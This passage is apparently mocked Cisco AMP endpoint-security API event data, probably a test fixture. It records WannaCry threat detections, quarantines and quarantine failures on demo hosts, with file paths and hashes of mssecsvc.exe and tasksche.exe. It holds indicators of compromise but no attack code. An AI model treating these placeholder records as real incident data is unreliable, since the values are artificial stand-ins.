Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741859","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":210000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":194000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741855","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":178000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741857","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":163000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":709000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214492323807000,"timestamp":1610631810,"timestamp_nanoseconds":447000000,"date":"2021-01-14T13:43:30+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214488028840000,"timestamp":1610631809,"timestamp_nanoseconds":916000000,"date":"2021-01-14T13:43:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945890085425,"timestamp":1610630976,"timestamp_nanoseconds":535214029,"date":"2021-01-14T13:29:36+00:00","event_type":"Potential Dropper Infection","event_type_id":1107296257,"detection":"W32.Variant:Gen.20gl.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610630976,"start_date":"2021-01-14T13:29:36+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412574627503014000,"timestamp":1610630889,"timestamp_nanoseconds":341000000,"date":"2021-01-14T13:28:09+00:00","event_type":"Policy 
Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":612000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769885","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":565000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769884","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":206000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769883","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":128000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769882","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":50000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":596000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769885","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":565000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769884","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":206000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769883","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":128000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769882","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":34000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":941000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802584","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":894000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802583","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802582","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802581","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 